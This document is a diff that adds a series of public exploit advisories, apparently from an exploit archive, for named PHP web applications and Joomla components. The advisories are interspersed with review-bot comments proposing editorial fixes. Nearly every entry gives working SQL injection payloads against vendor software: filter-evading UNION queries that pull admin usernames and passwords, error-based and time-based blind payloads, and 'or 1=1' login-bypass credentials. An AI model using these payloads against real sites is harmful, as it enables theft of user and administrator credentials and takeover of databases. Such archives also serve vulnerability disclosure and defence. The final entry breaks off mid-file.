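+<input type="text" name="username" id="textfield" value="' UNION ALL SELECT 1,CONCAT(VERSiON(),0x494853414e2053454e43414e),3,4,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari"/></td>
+</tr>
+<tr>
+<td height="45">Password</td>
+<td><label for="textfield"></label>
+<input type="password" name="password" id="textfield" value="Ver Ayari"/></td>
+</tr>
+</table>
+</div>
+<input type="submit" name="submit" value="LOGIN" />
+</form>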
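Review bot: The comment block gives the affected page as `http://localhost/[PATH]/admin`, but the form's `action` posts to `http://localhost/[PATH]/index.php`; one of the two is presumably wrong, or `[PATH]` in the form is meant to include `admin/`, and the advisory should say which. The HTML itself also reuses `id="textfield"` on both inputs, so both `<label for="textfield">` elements resolve to the first one; giving the password input its own id, e.g. `<input type="password" name="password" id="passfield" .../>` with a matching `<label for="passfield">`, keeps the PoC valid HTML.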
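--- a/platforms/php/webapps/43083.txt
+++ b/platforms/php/webapps/43083.txt
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: ZeeBuddy 2x - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.zeescripts.com/
+# Software Link: http://www.zeebuddy.com/
+# Demo: http://www.zeebuddy.com/demo/
+# Version: 2x
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15976
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
+#
+# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
+#
+# Parameter: groupid (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: groupid=1 AND 3188=3188
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: groupid=1 AND SLEEP(5)
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 9 columns
+# Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
+#
+# Etc..
+# # # # #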
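--- a/platforms/php/webapps/43084.txt
+++ b/platforms/php/webapps/43084.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' Parameter SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://vastal.com/
+# Software http://vastal.com/dating-zone-the-dating-software.html
+# Demo: http://datingzone.vastal.com/demo/
+# Version: 0.9.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15975
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/add_to_cart.php?product_id=[SQL]
+#
+# Parameter: product_id (GET)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: product_id=3 AND SLEEP(5)
+#
+# Etc..
+# # # # #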
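--- a/platforms/php/webapps/43085.txt
+++ b/platforms/php/webapps/43085.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: tPanel 2009 - Authentication Bypass
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.datacomponents.net/
+# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
+# Demo: http://demo.datacomponents.net/tpanel/
+# Version: 2009
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15974
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+#
+# http://localhost/[PATH]/login.php
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #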
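Review bot: The Description is the generic SQL-injection boilerplate while the title says "Authentication Bypass", and nothing in the file connects the two; since the PoC is the `User: 'or 1=1 or ''='` credential pair against `login.php`, the Description should state that the bypass is an SQL injection in the login credential check, e.g. `# SQL injection in the login.php username check allows the password comparison to be bypassed.` The Proof of Concept section also has a doubled `#` separator before the `login.php` line that the other advisories do not have.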
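--- a/platforms/php/webapps/43086.txt
+++ b/platforms/php/webapps/43086.txt
@@ -0,0 +1,44 @@
+# # # # #
+# Exploit Title: Sokial Social Network Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.sokial.net/
+# Software http://www.sokial.net/demonstrations-social-network.sk
+# Demo: http://demo.sokial.net/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15973
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/members_view.php?id=[SQL]
+#
+# 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END))
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Type: stacked queries
+# Title: MySQL > 5.0.11 stacked queries (comment)
+# Payload: id=2271;SELECT SLEEP(5)#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: id=2271 OR SLEEP(5)
+#
+# Etc..
+# # # # #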
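--- a/platforms/php/webapps/43087.txt
+++ b/platforms/php/webapps/43087.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.softdatepro.com/
+# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044
+# Demo: http://demo.softdatepro.com/
+# Version: 1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15972
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
+# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
+#
+# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
+#
+# http://localhost/[PATH]/admin
+#
+# Email: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #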
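Review bot: The `Email: 'or 1=1 or ''=' Pass: anything` line under `http://localhost/[PATH]/admin` describes a bypass of the admin login, which is a separate impact from the `profid`/`sender_id` injection that the title and description announce; the same applies to the 43088 entry that follows. Triage will otherwise file this as a single read-only SQLi, so the description should name both, e.g. `# The vulnerability allows an attacker to inject sql commands and to bypass the admin login....`. The PoC lines of this entry and 43088 are also byte-identical for two different products, which suggests a shared codebase; stating whether the second product was verified separately would help downstream consumers.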
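--- a/platforms/php/webapps/43088.txt
+++ b/platforms/php/webapps/43088.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.softdatepro.com/
+# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
+# Demo: http://www.ss.softdatepro.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15971
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
+# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
+#
+# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
+#
+# http://localhost/[PATH]/admin
+#
+# Email: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #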
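--- a/platforms/php/webapps/43089.txt
+++ b/platforms/php/webapps/43089.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: PHP CityPortal 2.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpcityportal.com/
+# Software Link: http://www.phpcityportal.com/index.php
+# Demo: http://phpcityportal.com/demo
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15970
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
+#
+# Parameter: cat (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
+# Payload: cat=1' OR NOT 6616=6616#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: cat=1' OR SLEEP(5)-- cCQQ
+#
+# Etc..
+# # # # #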
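Review bot: The PoC URL names the injection point as `nid` (`index.php?page=news&nid=[SQL]`) while the sqlmap-style block that follows says `Parameter: cat (GET)` and both payloads start with `cat=`; either the parameter line is wrong or the URL that exposes `cat` is missing. A maintainer patching the application cannot tell from this text which query to fix, and a WAF or log rule written from it would watch the wrong parameter. Either change the line to `# Parameter: nid (GET)` with payloads to match, or add the URL that actually carries `cat` above the block.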
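--- a/platforms/php/webapps/43090.txt
+++ b/platforms/php/webapps/43090.txt
@@ -0,0 +1,107 @@
+# # # # #
+# Exploit Title: PG All Share Video 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.pilotgroup.net/
+# Software Link: http://www.allsharevideo.com/features.php
+# Demo: http://demo.allsharevideo.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15969
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/search/tag/[SQL]
+# http://localhost/[PATH]/friends/index/1[SQL]
+# http://localhost/[PATH]/users/profile/1[SQL]
+# http://localhost/[PATH]/video_catalog/category/1[SQL]
+#
+# 'ANd(/*!06666seleCt+*/1/*!06666frOm*/(/*!06666seleCt*/%20COunt(*),/*!06666COnCAt*/((seleCt(seleCt+COnCAt(CAst(dAtAbAse()As%20ChAr),0x7e,0x496873616E53656e63616e))%20frOm%20infOrmAtiOn_sChemA.tAbles%20where%20tAble_sChemA=dAtAbAse()%20limit%200,1),flOOr(rAnd(0)*2))x%20frOm%20infOrmAtiOn_sChemA.tAbles%20grOup%20by%20x)A)%20AnD%20''='
+#
+# Parameter: #1* (URI)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND 2686=2686 AND 'UsmZ'='UsmZ
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND (SELECT 4572 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(4572=4572,1))),0x716b627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iudq'='iudq
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND SLEEP(5) AND 'iczN'='iczN
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 3 columns
+# Payload: http://localhost/[PATH]/search/tag/VerAyari' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6a71,0x4b6e4a524653614e47727a4f4464575253424c4d6c544f6b6a78454e4a756c75794d6a7765697269,0x716b627871)-- mAFc
+#
+# Parameter: #1* (URI)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: http://localhost/[PATH]/channels/category/7' AND 4239=4239 AND 'oXBo'='oXBo
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x7170626b71,(SELECT (ELT(4458=4458,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 3 columns
+# Payload: http://localhost/[PATH]/channels/category/7' UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x574355636a666d516c4d437a78696a5a6243555a46486f494a45455a6c49574e577765704a496367,0x7176787071)-- kJpu
+#
+# Parameter: #1* (URI)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload: http://localhost/[PATH]/friends/index/11' RLIKE (SELECT (CASE WHEN (2135=2135) THEN 11 ELSE 0x28 END))-- SVFb
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/friends/index/11' AND (SELECT 1564 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1564=1564,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DoZE
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: http://localhost/[PATH]/friends/index/11' OR SLEEP(5)-- Maum
+#
+# Parameter: #1* (URI)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: http://localhost/[PATH]/users/profile/1' AND 3612=3612 AND 'wNwI'='wNwI
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/users/profile/1' AND (SELECT 3555 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(3555=3555,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XrEj'='XrEj
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: http://localhost/[PATH]/users/profile/1' AND SLEEP(5) AND 'XZVf'='XZVf
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 3 columns
+# Payload: http://localhost/[PATH]/users/profile/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767671,0x7a7a646e536849756f717771546e4547497549465459754f65636946535375667577596755616876,0x717a7a7a71)-- UaUA
+#
+# Parameter: #1* (URI)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: http://localhost/[PATH]/video_catalog/category/1' AND 4550=4550 AND 'SAmI'='SAmI
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/video_catalog/category/1' AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(4089=4089,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PTze'='PTze
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: http://localhost/[PATH]/video_catalog/category/1' AND SLEEP(5) AND 'ptLy'='ptLy
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 3 columns
+# Payload: http://localhost/[PATH]/video_catalog/category/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7171,0x4c5a694b4948566c59527663484b7a466c76725746684863506159646973414749617966634d5145,0x716b786a71)-- zDQK
+#
+# Etc..
+# # # # #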
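Review bot: The sqlmap results contain a fifth injectable route, `channels/category/` (the second `Parameter: #1* (URI)` block, payloads on `channels/category/7'`), but the PoC list above names only `search/tag`, `friends/index`, `users/profile` and `video_catalog/category`, so anyone who reads just the summary misses an affected endpoint. Add `# http://localhost/[PATH]/channels/category/1[SQL]` to that list so the affected routes are enumerated in one place. The five blocks are also all headed identically as `Parameter: #1* (URI)` and can only be told apart by reading each payload; a one-line route label per block, e.g. `# channels/category`, would make the entry usable for patch verification.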
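--- a/platforms/php/webapps/43091.txt
+++ b/platforms/php/webapps/43091.txt
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: MyBuilder Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.contractorscripts.com/
+# Software Link: http://order.contractorscripts.com/
+# Demo: http://demo.contractorscripts.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15968
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL]
+#
+# 1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
+#
+# Parameter: subcategory (GET)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: subcategory=1' OR SLEEP(5)-- RvzR
+#
+# Etc..
+# # # # #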
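--- a/platforms/php/webapps/43092.txt
+++ b/platforms/php/webapps/43092.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Mailing List Manager Pro 3.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.vote-pro.com/
+# Software Link: http://www.mailing-manager.com/demo.html
+# Demo: http://www.mailing-manager.com/demo-gold/
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15967
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL]
+#
+# -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+-
+#
+# http://localhost/[PATH]/admin/template/?edit=[SQL]
+#
+# Etc..
+# # # # #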
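--- a/platforms/php/webapps/43093.txt
+++ b/platforms/php/webapps/43093.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Joomla! Component Zh YandexMap 6.1.1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://zhuk.cc/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
+# Demo: http://joomla.zhuk.cc/index.php
+# Version: 6.1.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15966
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL]
+#
+# Parameter: placemarklistid (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013#
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
+#
+# Etc..
+# # # # #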
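--- a/platforms/php/webapps/43094.txt
+++ b/platforms/php/webapps/43094.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Joomla! Component NS Download Shop 2.2.6 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: https://nswd.co/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/paid-downloads/ns-downloadshop/
+# Demo: https://ds.nswd.co/
+# Version: 2.2.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15965
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL]
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
+# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END))
+#
+# Type: error-based
+# Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
+# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Etc..
+# # # # #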
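--- a/platforms/php/webapps/43095.txt
+++ b/platforms/php/webapps/43095.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Job Board Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.nicephpscripts.com/
+# Software http://www.nicephpscripts.com/job_board_script.htm
+# Demo: http://www.nicephpscripts.com/scripts/faqscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15964
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?nice_theme=[SQL]
+#
+# Parameter: nice_theme (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: nice_theme=2 AND 9686=9686
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: nice_theme=2 AND SLEEP(5)
+#
+# Etc..
+# # # # #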
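Review bot: The header line `# Software http://www.nicephpscripts.com/job_board_script.htm` is missing the `Link:` label that every other entry in this commit uses (the sokial.net entry earlier on this page has the same omission), and the `# Demo:` URL points at `scripts/faqscript/`, which does not look like the job board demo. Together with `# Version: N/A` and an unversioned title, there is no way for a site owner to tell an affected install from a fixed one. Change the first line to `# Software Link: http://www.nicephpscripts.com/job_board_script.htm` and confirm the demo URL and the version that was tested.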
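--- a/platforms/php/webapps/43096.txt
+++ b/platforms/php/webapps/43096.txt
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: iTech Gigs Script 1.21 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/the-gigs-script/
+# Demo: http://gigs.itechscripts.com/
+# Version: 1.21
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15963
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
+#
+# -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+-
+#
+# http://localhost/[PATH]/service-provider.php?ser=[SQL]
+#
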